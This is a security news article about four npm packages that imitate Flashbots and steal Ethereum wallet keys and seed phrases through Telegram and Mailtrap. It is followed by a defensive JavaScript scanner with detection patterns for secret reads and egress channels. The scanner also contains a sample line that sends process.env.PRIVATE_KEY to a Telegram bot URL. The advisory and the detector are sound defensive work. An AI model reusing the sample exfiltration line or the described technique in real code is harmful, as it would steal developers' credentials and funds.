Malicious npm Packages Imitate Flashbots to Steal Ethereum Wallet Keys

A new set of four malicious packages has been discovered in the NPM package registry, designed to steal cryptocurrency wallet credentials from Ethereum developers. These packages masquerade as legitimate cryptographic utilities and Flashbots MEV infrastructure while secretly exfiltrating private keys and mnemonic seeds to a Telegram bot controlled by the threat actor. Socket researcher Kush Pandya highlighted that the packages were uploaded by a user named “Flashbotts,” with the earliest library appearing in September 2023 and the most recent upload on August 19, 2025. The identified packages include @Flashbotts/Ethers-Provider-Bundle, Flashbot-SDK-Eth, SDK-Ethers, and Gram-Utilz, all of which remain available for download.

The impersonation of Flashbots is particularly concerning because of the project's role in mitigating the adverse effects of Maximal Extractable Value (MEV) on the Ethereum network. The most dangerous package, @Flashbotts/Ethers-Provider-Bundle, conceals malicious operations under the guise of offering full Flashbots API compatibility. It exfiltrates environment variables over SMTP using Mailtrap and manipulates transactions so that unsigned transactions are redirected to an attacker-controlled wallet. SDK-Ethers is mostly benign, but it includes functions that transmit mnemonic seed phrases to a Telegram bot when invoked by unsuspecting developers. Vietnamese-language comments in the source code suggest that the financially motivated threat actor may be Vietnamese-speaking. Taken together, the packages reflect a deliberate effort to exploit the trust associated with the Flashbots platform for software supply chain attacks.
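The following is an added defender-side example, not code from the advisory or from Socket: it checks a project's package.json or package-lock.json for the four package names reported above and scans a module's source text for the combination the article describes, a secret read (environment variables, mnemonics, private keys) together with an egress path to Telegram or SMTP/Mailtrap. The package names come from this page; the sample lockfile and source snippet are constructed for illustration.

```javascript
// Package names as reported in the advisory (npm stores names in lowercase).
const ADVISORY_PACKAGES = [
  '@flashbotts/ethers-provider-bundle', 'flashbot-sdk-eth', 'sdk-ethers', 'gram-utilz',
];

// Secret sources and egress sinks that a wallet/bundle library has no reason to combine.
const SECRET_SOURCES = [/process\.env\b/, /mnemonic/i, /privateKey/i, /seed\s*phrase/i];
const EGRESS_SINKS = [/api\.telegram\.org/i, /mailtrap/i, /nodemailer|createTransport\(/i];

// Returns dependency names matching the advisory list. Accepts either a
// package-lock.json (v2/v3 "packages" map, keys like "node_modules/@scope/name",
// nested paths included) or a package.json (dependencies/devDependencies).
function findAdvisoryPackages(manifest) {
  const names = new Set();
  for (const key of Object.keys(manifest.packages || {})) {
    const m = key.match(/node_modules\/((?:@[^/]+\/)?[^/]+)$/);
    if (m) names.add(m[1]);
  }
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const n of Object.keys(manifest[field] || {})) names.add(n);
  }
  return [...names].filter((n) => ADVISORY_PACKAGES.includes(n.toLowerCase())).sort();
}

// Scans one module's source text. The result is only marked suspicious when at least
// one secret source AND one egress sink are present: reading process.env alone is
// common in legitimate code, but pairing it with a Telegram or mail endpoint matches
// the behaviour described for the Flashbots look-alikes.
function scanSource(src) {
  const sources = SECRET_SOURCES.filter((re) => re.test(src)).map(String);
  const sinks = EGRESS_SINKS.filter((re) => re.test(src)).map(String);
  return { suspicious: sources.length > 0 && sinks.length > 0, sources, sinks };
}

// Constructed sample inputs (not real package contents).
const SAMPLE_LOCK = { packages: {
  '': {}, 'node_modules/ethers': {},
  'node_modules/@flashbotts/ethers-provider-bundle': {}, 'node_modules/gram-utilz': {},
} };
const SAMPLE_SRC = "const key = process.env.PRIVATE_KEY;\n" +
  "fetch('https://api.telegram.org/bot' + token + '/sendMessage?text=' + key);";

console.log('advisory packages found:', findAdvisoryPackages(SAMPLE_LOCK));
console.log('source scan:', scanSource(SAMPLE_SRC));
```

Run it against a real project by reading package-lock.json with JSON.parse and feeding each file under node_modules to scanSource; treat a hit as a reason to review the package, not as proof on its own.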

Categories: Malicious Packages, Cryptocurrency Theft, Software Supply Chain Attacks 

Tags: Malicious Packages, npm Registry, Cryptocurrency Theft, Ethereum Developers, Flashbots, Private Keys, Mnemonic Seeds, Telegram Bot, Software Supply Chain, Trust Exploitation 
